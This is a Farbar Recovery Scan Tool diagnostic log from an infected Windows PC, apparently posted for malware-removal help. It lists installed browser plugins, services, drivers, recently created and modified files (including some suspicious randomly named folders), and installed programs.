BHO: DivX Plus Web Player HTML5 <video> -> {326E768D-4182-46FD-9C16-1449A49795F4} -> C:\Program Files\DivX\DivX Plus Web Player\ie\DivXHTML5\DivXHTML5.dll (DivX, LLC)

BHO: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)

BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)

BHO: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)

Toolbar: HKLM - &Windows Live Toolbar - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - C:\Program Files\Windows Live\Toolbar\wltcore.dll (Microsoft Corporation)

Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)




DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab

DPF: {F27237D7-93C8-44C2-AC6E-D6057B9A918F} https://juniper.net/dana-cached/sc/JuniperSetupClient.cab

Handler: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\Windows Live\Messenger\msgrapp.14.0.8050.1202.dll (Microsoft Corporation)

Handler: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\Windows Live\Messenger\msgrapp.14.0.8050.1202.dll (Microsoft Corporation)

Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\McAfee\MSC\McSnIePl.dll (McAfee, Inc.)

Winsock: Catalog5 07 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)

Tcpip\Parameters: [DhcpNameServer] 192.168.1.1

 

FireFox:

========

FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_15_0_0_152.dll ()

FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()

FF Plugin: @divx.com/DivX Browser Plugin,version=1.0.0 -> C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC)

FF Plugin: @divx.com/DivX VOD Helper,version=1.0.0 -> C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)

FF Plugin: @java.com/DTPlugin,version=10.71.2 -> C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)

FF Plugin: @java.com/JavaPlugin,version=10.71.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)

FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL ()

FF Plugin: @mcafee.com/MVT -> C:\Program Files\McAfee\Supportability\MVT\npmvtplugin.dll (McAfee, Inc.)

FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)

FF Plugin: @microsoft.com/WLPG,version=14.0.8051.1204 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)

FF Plugin: @microsoft.com/WPF,version=3.5 -> C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)

FF Plugin: @nexon.net/NxGame -> C:\ProgramData\NexonUS\NGM\npNxGameUS.dll (Nexon)

FF Plugin: @pandonetworks.com/PandoWebPlugin -> C:\Program Files\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)

FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)

FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)

FF Plugin: @videolan.org/vlc,version=2.1.3 -> C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN)

FF Plugin: @videolan.org/vlc,version=2.1.5 -> C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN)

FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 9.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)

FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension

FF Extension: Microsoft .NET Framework Assistant - C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-04-07]

FF HKLM\...\Firefox\Extensions: [{7BA52691-1876-45ce-9EE6-54BCB3B04BBC}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\Norton\coFFPlgn

FF HKLM\...\Firefox\Extensions: [{23fcfd51-4958-4f00-80a3-ae97e717ed8b}] - C:\Program Files\DivX\DivX Plus Web Player\firefox\DivXHTML5

FF Extension: DivX Plus Web Player HTML5 <video> - C:\Program Files\DivX\DivX Plus Web Player\firefox\DivXHTML5 [2013-02-23]

 

Chrome: 

=======

CHR HomePage: Default -> hxxp://www.google.com

CHR StartupUrls: Default -> "hxxp://www.google.com"

CHR DefaultSearchKeyword: Default -> search.live.com


CHR DefaultSuggestURL: Default -> 

CHR Profile: C:\Users\Tyler\AppData\Local\Google\Chrome\User Data\Default

CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Tyler\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-28]

CHR Extension: (YouTube) - C:\Users\Tyler\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2012-09-26]

CHR Extension: (Google Search) - C:\Users\Tyler\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2012-09-26]

CHR Extension: (Google Wallet) - C:\Users\Tyler\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-08-22]

CHR Extension: (Gmail) - C:\Users\Tyler\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2012-09-26]

CHR HKLM\...\Chrome\Extension: [nneajnkjbffgblleaoojgaacokifdkhm] - C:\Program Files\DivX\DivX Plus Web Player\chrome\DivXHTML5\DivXHTML5.crx [2013-02-07]

 

========================== Services (Whitelisted) =================

 

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

 

S4 AESTFilters; C:\Windows\System32\DriverStore\FileRepository\stwrt.inf_ae0b52e0\aestsrv.exe [81920 2008-12-14] (Andrea Electronics Corporation)

S4 asurscsi; C:\Users\Tyler\AppData\Local\Temp\MSI3834.tmp [142336 2009-10-21] (Voyetra Turtle Beach, Inc.) [File not signed]

S4 DockLoginService; C:\Program Files\Dell\DellDock\DockLogin.exe [155648 2008-09-23] (Stardock Corporation) [File not signed]

S3 EvoSvc; C:\Program Files\Echobit\Evolve\EvoSvc.exe [1579936 2014-09-23] (Echobit LLC)

S4 GameConsoleService; C:\Program Files\WildTangent\Dell Games\Dell Game Console\GameConsoleService.exe [164600 2008-07-04] (WildTangent, Inc.)

S4 hnmsvc; c:\ProgramData\SingleClick Systems\Advanced Networking Service\hnm_svc.exe [820464 2008-09-30] (Dell Inc.)

R2 HomeNetSvc; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)

S4 lxec_device; C:\Windows\system32\lxeccoms.exe [598696 2010-04-14] ( )

R2 MBAMScheduler; C:\Program Files\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2014-10-01] (Malwarebytes Corporation)

R2 MBAMService; C:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe [968504 2014-10-01] (Malwarebytes Corporation)

R2 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [145568 2014-04-25] (McAfee, Inc.)

R2 McNaiAnn; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)

R3 McODS; C:\Program Files\McAfee\VirusScan\mcods.exe [472072 2014-06-12] (McAfee, Inc.)

R2 mcpltsvc; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)

R2 McProxy; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)

R2 mfecore; C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe [655936 2014-07-24] (McAfee, Inc.)

R2 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [169800 2014-06-20] (McAfee, Inc.)

R2 mfevtp; C:\Windows\system32\mfevtps.exe [179600 2014-06-20] (McAfee, Inc.)

S4 sprtsvc_DellSupportCenter; C:\Program Files\Dell Support Center\bin\sprtsvc.exe [201968 2008-10-04] (SupportSoft, Inc.)

R2 STacSV; C:\Windows\System32\DriverStore\FileRepository\stwrt.inf_ae0b52e0\STacSV.exe [241746 2008-12-14] (IDT, Inc.)

S4 UMVPFSrv; C:\Program Files\Common Files\logishrd\LVMVFM\UMVPFSrv.exe [450848 2012-01-18] (Logitech Inc.)

R2 yksvc; RUNDLL32.EXE ykx32coinst,serviceStartProc [X]

 

==================== Drivers (Whitelisted) ====================

 

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

 

S3 BCM42RLY; C:\Windows\System32\drivers\BCM42RLY.sys [18424 2008-12-22] (Broadcom Corporation)

S3 cfwids; C:\Windows\System32\drivers\cfwids.sys [62832 2014-06-20] (McAfee, Inc.)

R3 EvolveVirtualAdapter; C:\Windows\System32\DRIVERS\evolve.sys [18584 2014-08-10] (Echobit, LLC)

R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [23256 2014-10-01] (Malwarebytes Corporation)

R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [114904 2014-11-13] (Malwarebytes Corporation)

R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [51928 2014-10-01] (Malwarebytes Corporation)

R3 mfeapfk; C:\Windows\System32\drivers\mfeapfk.sys [135968 2014-06-20] (McAfee, Inc.)

R3 mfeavfk; C:\Windows\System32\drivers\mfeavfk.sys [238176 2014-06-20] (McAfee, Inc.)

S3 mfebopk; C:\Windows\System32\drivers\mfebopk.sys [67816 2014-06-20] (McAfee, Inc.)

R3 mfefirek; C:\Windows\System32\drivers\mfefirek.sys [369248 2014-06-20] (McAfee, Inc.)

R0 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [576048 2014-06-20] (McAfee, Inc.)

R3 mfencbdc; C:\Windows\System32\DRIVERS\mfencbdc.sys [349192 2014-07-24] (McAfee, Inc.)

S3 mfencrk; C:\Windows\System32\DRIVERS\mfencrk.sys [81296 2014-07-24] (McAfee, Inc.)

R0 mfewfpk; C:\Windows\System32\drivers\mfewfpk.sys [217224 2014-06-20] (McAfee, Inc.)

R2 Packet; C:\Windows\System32\DRIVERS\packet.sys [22016 2008-06-17] (SingleClick Systems)

S3 EagleNT; \??\C:\Windows\system32\drivers\EagleNT.sys [X]

S3 EagleXNt; \??\C:\Windows\system32\drivers\EagleXNt.sys [X]

S3 IpInIp; system32\DRIVERS\ipinip.sys [X]

S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]

S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]

 

==================== NetSvcs (Whitelisted) ===================

 

 

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

 

 

==================== One Month Created Files and Folders ========

 

(If an entry is included in the fixlist, the file\folder will be moved.)

 

2014-11-13 18:59 - 2014-11-13 19:00 - 00022240 _____ () C:\Users\Tyler\Downloads\FRST.txt

2014-11-13 18:58 - 2014-11-13 18:58 - 01108480 _____ (Farbar) C:\Users\Tyler\Desktop\FRST.exe

2014-11-13 18:53 - 2014-11-13 18:53 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee

2014-11-09 06:27 - 2014-11-09 06:27 - 00021241 _____ () C:\Users\Tyler\Desktop\virus removal logs.zip

2014-11-09 05:58 - 2014-11-13 18:59 - 00000000 ____D () C:\FRST

2014-11-09 05:54 - 2014-11-09 05:54 - 00003181 _____ () C:\Users\Tyler\Desktop\Malwarebytes Help Making a post.txt

2014-11-09 04:23 - 2014-11-09 04:23 - 00229927 _____ () C:\Users\Tyler\Desktop\Scan_2014-11-9-4-10.txt

2014-11-09 04:19 - 2014-11-13 18:46 - 00114904 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys

2014-11-09 04:17 - 2014-11-09 04:17 - 00000901 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk

2014-11-09 04:17 - 2014-11-09 04:17 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware

2014-11-09 04:17 - 2014-10-01 11:11 - 00075480 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys

2014-11-09 04:17 - 2014-10-01 11:11 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys

2014-11-09 04:17 - 2014-10-01 11:11 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys

2014-11-09 04:16 - 2014-11-09 04:17 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware

2014-11-09 04:16 - 2014-11-09 04:16 - 00000000 ____D () C:\ProgramData\Malwarebytes

2014-11-09 03:27 - 2014-11-09 05:41 - 00000000 ____D () C:\Users\Tyler\AppData\Local\Igdsoft

2014-11-09 03:27 - 2014-11-09 03:27 - 00000000 ____D () C:\Users\Tyler\AppData\Local\Ewfdtion

2014-11-08 22:21 - 2014-11-08 22:21 - 00000000 ____D () C:\Program Files\Reason

2014-11-08 22:16 - 2014-11-08 22:17 - 02469552 _____ (Reason Company Software Inc.) C:\Users\Tyler\Desktop\herdProtectScan_Portable.exe

2014-11-08 22:07 - 2014-11-08 22:34 - 19828376 _____ (Malwarebytes Corporation ) C:\Users\Tyler\Desktop\mbam-setup-2.0.3.1025.exe

2014-11-08 22:05 - 2014-11-09 03:56 - 00000000 ____D () C:\ProgramData\HitmanPro

2014-11-08 21:59 - 2014-11-08 22:02 - 10284408 _____ (SurfRight B.V.) C:\Users\Tyler\Desktop\HitmanPro.exe

2014-11-08 21:49 - 2014-11-08 22:00 - 00000000 ____D () C:\Users\Tyler\AppData\Roaming\Nihyqyx

2014-11-08 21:45 - 2014-11-08 21:45 - 00000000 ____D () C:\ProgramData\PancUfizy

2014-11-08 20:35 - 2014-11-09 07:08 - 00000160 ____H () C:\ProgramData\@system3.att

2014-11-08 20:34 - 2014-11-09 07:08 - 00000424 _____ () C:\ProgramData\@system.temp

2014-11-08 20:34 - 2014-11-09 04:53 - 00000000 ____D () C:\Users\Tyler\AppData\Roaming\FrameworkUpdate7

2014-11-08 20:34 - 2014-11-08 20:34 - 00000448 ____H () C:\Users\Tyler\AppData\Roaming\麽鎒駓覜

2014-11-08 20:34 - 2014-11-08 20:34 - 00000000 ____D () C:\ProgramData\DufjiGmudi

2014-11-08 20:33 - 2014-11-09 03:36 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage

2014-10-24 20:32 - 2014-10-24 20:32 - 00001666 _____ () C:\Users\Public\Desktop\iTunes.lnk

2014-10-24 20:32 - 2014-10-24 20:32 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes

2014-10-24 20:29 - 2014-10-24 20:31 - 00000000 ____D () C:\ProgramData\B0FFCDD9-5261-4e59-B29A-17A4FABDEBAB

2014-10-24 20:29 - 2014-10-24 20:31 - 00000000 ____D () C:\Program Files\iTunes

2014-10-24 20:29 - 2014-10-24 20:29 - 00000000 ____D () C:\Program Files\iPod

2014-10-20 05:19 - 2014-11-09 06:24 - 00000886 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA1cfec4f46187060.job

2014-10-18 14:25 - 2014-11-09 06:30 - 00000908 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-879967681-4271235005-1519339517-1000UA1cfeb0948c7c370.job

2014-10-17 21:54 - 2014-10-17 21:54 - 00001878 _____ () C:\Users\Public\Desktop\Skype.lnk

2014-10-17 21:54 - 2014-10-17 21:54 - 00000000 ___RD () C:\Program Files\Skype

2014-10-17 21:54 - 2014-10-17 21:54 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype

2014-10-17 21:54 - 2014-10-17 21:54 - 00000000 ____D () C:\Program Files\Common Files\Skype

2014-10-17 02:13 - 2014-06-15 17:18 - 01131664 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll

2014-10-17 02:13 - 2014-06-13 13:22 - 00156824 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll

2014-10-17 02:13 - 2014-06-13 13:22 - 00081560 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll

2014-10-17 02:09 - 2014-09-27 18:29 - 02054656 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys

2014-10-17 02:07 - 2014-09-04 18:27 - 00143360 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\fastfat.sys

2014-10-17 02:02 - 2014-09-16 11:56 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll

2014-10-16 21:55 - 2014-10-16 21:55 - 00000000 ____D () C:\Program Files\SystemRequirementsLab

2014-10-16 21:54 - 2014-10-16 21:54 - 00663552 _____ () C:\Users\Tyler\Downloads\Detection.msi

2014-10-16 16:32 - 2014-10-16 16:32 - 00000000 ____D () C:\Program Files\Common Files\Java

2014-10-16 16:32 - 2014-10-16 16:30 - 00272808 _____ (Oracle Corporation) C:\Windows\system32\javaws.exe

2014-10-16 16:31 - 2014-10-16 16:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java

2014-10-16 16:31 - 2014-10-16 16:30 - 00175528 _____ (Oracle Corporation) C:\Windows\system32\javaw.exe

2014-10-16 16:31 - 2014-10-16 16:30 - 00175528 _____ (Oracle Corporation) C:\Windows\system32\java.exe

2014-10-16 16:31 - 2014-10-16 16:30 - 00096680 _____ (Oracle Corporation) C:\Windows\system32\WindowsAccessBridge.dll

2014-10-16 05:26 - 2014-09-19 17:53 - 12364288 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll

2014-10-16 05:26 - 2014-09-19 17:44 - 01810432 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll

2014-10-16 05:26 - 2014-09-19 17:41 - 09739776 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll

2014-10-16 05:26 - 2014-09-19 17:39 - 01138688 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll

2014-10-16 05:26 - 2014-09-19 17:38 - 01129472 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll

2014-10-16 05:26 - 2014-09-19 17:37 - 01427968 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl

2014-10-16 05:26 - 2014-09-19 17:36 - 00231936 _____ (Microsoft Corporation) C:\Windows\system32\url.dll

2014-10-16 05:26 - 2014-09-19 17:36 - 00142848 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe

2014-10-16 05:26 - 2014-09-19 17:36 - 00065536 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll

2014-10-16 05:26 - 2014-09-19 17:35 - 01802752 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll

2014-10-16 05:26 - 2014-09-19 17:35 - 00717824 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll

2014-10-16 05:26 - 2014-09-19 17:35 - 00607744 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll

2014-10-16 05:26 - 2014-09-19 17:35 - 00421376 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll

2014-10-16 05:26 - 2014-09-19 17:35 - 00041472 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll

2014-10-16 05:26 - 2014-09-19 17:34 - 02382848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb

2014-10-16 05:26 - 2014-09-19 17:34 - 00353792 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll

2014-10-16 05:26 - 2014-09-19 17:34 - 00223232 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll

2014-10-16 05:26 - 2014-09-19 17:34 - 00073216 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll

2014-10-16 05:26 - 2014-09-19 17:34 - 00011776 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe

2014-10-16 05:26 - 2014-09-19 17:34 - 00010752 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe

2014-10-16 05:26 - 2014-09-19 17:33 - 00176640 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll

 

==================== One Month Modified Files and Folders =======

 

(If an entry is included in the fixlist, the file\folder will be moved.)

 

2014-11-13 19:00 - 2012-04-18 17:41 - 00000000 ____D () C:\Users\Tyler\AppData\Local\PMB Files

2014-11-13 18:57 - 2009-03-15 15:57 - 01533365 _____ () C:\Windows\WindowsUpdate.log

2014-11-13 18:53 - 2014-01-08 10:11 - 00001753 _____ () C:\Users\Public\Desktop\McAfee AntiVirus.lnk

2014-11-13 18:51 - 2006-11-02 05:33 - 00759542 _____ () C:\Windows\system32\PerfStringBackup.INI

2014-11-13 18:49 - 2009-04-08 16:54 - 00000000 ____D () C:\Users\Tyler\Tracing

2014-11-13 18:46 - 2014-02-18 07:13 - 00000882 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore1cf2ca2e648d290.job

2014-11-13 18:44 - 2006-11-02 08:01 - 00000006 ____H () C:\Windows\Tasks\SA.DAT

2014-11-13 18:44 - 2006-11-02 07:47 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0

2014-11-13 18:44 - 2006-11-02 07:47 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0

2014-11-09 15:52 - 2006-11-02 08:01 - 00032630 _____ () C:\Windows\Tasks\SCHEDLGU.TXT

2014-11-09 15:40 - 2008-01-20 21:47 - 01296150 _____ () C:\Windows\PFRO.log

2014-11-09 07:14 - 2006-11-02 06:18 - 00000000 ____D () C:\Windows\Web

2014-11-09 07:11 - 2011-08-14 22:50 - 00000000 ____D () C:\Users\Tyler\AppData\Roaming\Skype

2014-11-09 06:31 - 2010-01-13 20:36 - 00000680 _____ () C:\Users\Tyler\AppData\Local\d3d9caps.dat

2014-11-09 06:30 - 2012-09-26 16:12 - 00000908 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-879967681-4271235005-1519339517-1000UA.job

2014-11-09 06:24 - 2011-04-07 19:55 - 00000886 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job

2014-11-09 06:22 - 2012-04-13 04:03 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job

2014-11-09 04:01 - 2012-01-15 01:41 - 00000000 ____D () C:\Users\Tyler\AppData\Local\CrashDumps

2014-11-09 03:40 - 2011-08-14 20:42 - 00000000 ____D () C:\ProgramData\Anti-phishing Domain Advisor

2014-11-08 19:31 - 2012-09-26 16:12 - 00000856 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-879967681-4271235005-1519339517-1000Core.job

2014-10-27 14:27 - 2012-09-26 16:14 - 00002044 _____ () C:\Users\Tyler\Desktop\Google Chrome.lnk

2014-10-24 20:29 - 2014-10-03 21:57 - 00000000 ____D () C:\ProgramData\188F1432-103A-4ffb-80F1-36B633C5C9E1

2014-10-24 20:29 - 2014-01-24 20:59 - 00000000 ____D () C:\Program Files\Common Files\Apple

2014-10-17 21:54 - 2011-08-14 22:50 - 00000000 ____D () C:\ProgramData\Skype

2014-10-17 02:51 - 2006-11-02 06:18 - 00000000 ____D () C:\Windows\Microsoft.NET

2014-10-17 02:35 - 2006-11-02 07:47 - 03627952 _____ () C:\Windows\system32\FNTCACHE.DAT

2014-10-17 02:13 - 2009-04-14 16:07 - 00000000 ____D () C:\ProgramData\Microsoft Help

2014-10-16 22:08 - 2011-08-19 18:11 - 00000000 ____D () C:\Program Files\Steam

2014-10-16 16:33 - 2013-10-21 21:40 - 00000000 ____D () C:\ProgramData\Oracle

2014-10-16 05:20 - 2012-08-26 03:10 - 00000858 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\LINE.lnk

2014-10-16 05:20 - 2012-08-26 03:10 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LINE

 

Files to move or delete:

====================

C:\ProgramData\hash.dat

 

 

Some content of TEMP:

====================

C:\Users\Tyler\AppData\Local\Temp\DivXSetup.exe

C:\Users\Tyler\AppData\Local\Temp\install_flashplayer11x32ax_gtbp_chrd_au_aih.exe

C:\Users\Tyler\AppData\Local\Temp\jre-6u31-windows-i586-iftw-rv.exe

C:\Users\Tyler\AppData\Local\Temp\jre-6u33-windows-i586-iftw.exe

C:\Users\Tyler\AppData\Local\Temp\jre-6u35-windows-i586-iftw.exe

C:\Users\Tyler\AppData\Local\Temp\jre-6u37-windows-i586-iftw.exe

C:\Users\Tyler\AppData\Local\Temp\jre-6u39-windows-i586-iftw.exe

C:\Users\Tyler\AppData\Local\Temp\jre-7u17-windows-i586-iftw.exe

C:\Users\Tyler\AppData\Local\Temp\jre-7u21-windows-i586-iftw.exe

C:\Users\Tyler\AppData\Local\Temp\jre-7u25-windows-i586-iftw.exe

C:\Users\Tyler\AppData\Local\Temp\jre-7u45-windows-i586-iftw.exe

C:\Users\Tyler\AppData\Local\Temp\jre-7u51-windows-i586-iftw.exe

C:\Users\Tyler\AppData\Local\Temp\jre-7u55-windows-i586-iftw.exe

C:\Users\Tyler\AppData\Local\Temp\jre-7u60-windows-i586-iftw.exe

C:\Users\Tyler\AppData\Local\Temp\jre-7u71-windows-i586-iftw.exe

C:\Users\Tyler\AppData\Local\Temp\NGMDll.dll

C:\Users\Tyler\AppData\Local\Temp\NGMResource.dll

C:\Users\Tyler\AppData\Local\Temp\NGMSetup.exe

C:\Users\Tyler\AppData\Local\Temp\SkypeSetup.exe

C:\Users\Tyler\AppData\Local\Temp\swt-win32-3349.dll

C:\Users\Tyler\AppData\Local\Temp\tmp17EA.exe

C:\Users\Tyler\AppData\Local\Temp\tmpE2E6.exe

C:\Users\Tyler\AppData\Local\Temp\unicows.dll

C:\Users\Tyler\AppData\Local\Temp\UpdateFlashPlayer_8459c5d2.exe

C:\Users\Tyler\AppData\Local\Temp\vlc-2.1.5-win32.exe

 

 

==================== Bamital & volsnap Check =================

 

(There is no automatic fix for files that do not pass verification.)

 

C:\Windows\explorer.exe => File is digitally signed

C:\Windows\system32\winlogon.exe => File is digitally signed

C:\Windows\system32\wininit.exe => File is digitally signed

C:\Windows\system32\svchost.exe => File is digitally signed

C:\Windows\system32\services.exe => File is digitally signed

C:\Windows\system32\User32.dll => File is digitally signed

C:\Windows\system32\userinit.exe => File is digitally signed

C:\Windows\system32\rpcss.dll => File is digitally signed

C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

 

 

LastRegBack: 2014-11-13 18:55

 

==================== End Of Log ============================

 


Additional scan result of Farbar Recovery Scan Tool (x86) Version: 13-11-2014 01

Ran by Tyler at 2014-11-13 19:01:02

Running from C:\Users\Tyler\Downloads

Boot Mode: Normal

==========================================================

 

 

==================== Security Center ========================

 

(If an entry is included in the fixlist, it will be removed.)

 

AV: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {ADA629C7-7F48-5689-624A-3B76997E0892}

AS: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {16C7C823-5972-5907-58FA-0004E2F9422F}

AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

 

==================== Installed Programs ======================

 

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

 

Ace of Spades (HKLM\...\Steam App 224540) (Version:  - Jagex Limited)

Acrobat.com (HKLM\...\com.adobe.mauby.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 1.1.377 - Adobe Systems Incorporated)

Acrobat.com (Version: 0.0.0 - Adobe Systems Incorporated) Hidden

Adobe AIR (HKLM\...\Adobe AIR) (Version: 2.7.1.19610 - Adobe Systems Incorporated)

Adobe Community Help (HKLM\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 3.0.0.400 - Adobe Systems Incorporated)

Adobe Flash Player 15 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)

Adobe Flash Player 15 Plugin (HKLM\...\Adobe Flash Player Plugin) (Version: 15.0.0.152 - Adobe Systems Incorporated)

Adobe Media Player (HKLM\...\com.adobe.amp.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 1.8 - Adobe Systems Incorporated)

Adobe Reader 9.5.5 (HKLM\...\{AC76BA86-7AD7-1033-7B44-A95000000001}) (Version: 9.5.5 - Adobe Systems Incorporated)

